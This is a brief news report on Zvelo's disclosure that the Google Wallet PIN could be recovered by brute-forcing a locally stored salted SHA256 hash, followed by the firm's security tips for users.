Web security provider Zvelo has uncovered a way crack the Google Wallet PIN security feature.
Using an app called “Wallet Cracker,” Zvelo was able to expose the PIN of a Google Wallet account without entering a single invalid attempt – five invalid attempts and the wallet locks out.
Check out the video for a demonstration:
So how did they do it?
“Within the PIN information section was a long integer ‘salt’ and a SHA256 hex encoded string ‘hash,'” Zvelo said in a release. “Knowing that the PIN can only be a 4-digit numeric value, it dawned on us that a brute-force attack would only require calculating, at most, 10,000 SHA256 hashes. This is trivial even on a platform as limited as a smart phone. Proving this hypothesis took little time.”
Zvelo says it has shared the discovery with Google, who confirmed the issue and agreed to “work quickly to resolve it.” In the meantime, Zvelo offers the following recommendations for Wallet users:
Do Not “Root” the Cell Phone – Doing so will be one less step for a thief.
Enable Lock Screens – Face Unlock, Pattern, PIN and Password all increase physical security to the device. Slide, however, does not.
Disable USB Debugging – When enabled, the data on mobile devices can be accessed without first passing a lock screen challenge unless Full Disk Encryption is also enabled.
Enable Full Disk Encryption – This will prevent even USB Debugging from bypassing the lock screen.
Maintain Device Up-To-Date – Ensure the device is current with the latest official software. Unfortunately, users are largely at the behest of their carrier and cell phone manufacturer for this. Using only official software and keeping devices up-to-date is the best way to minimize vulnerabilities and increase security overall.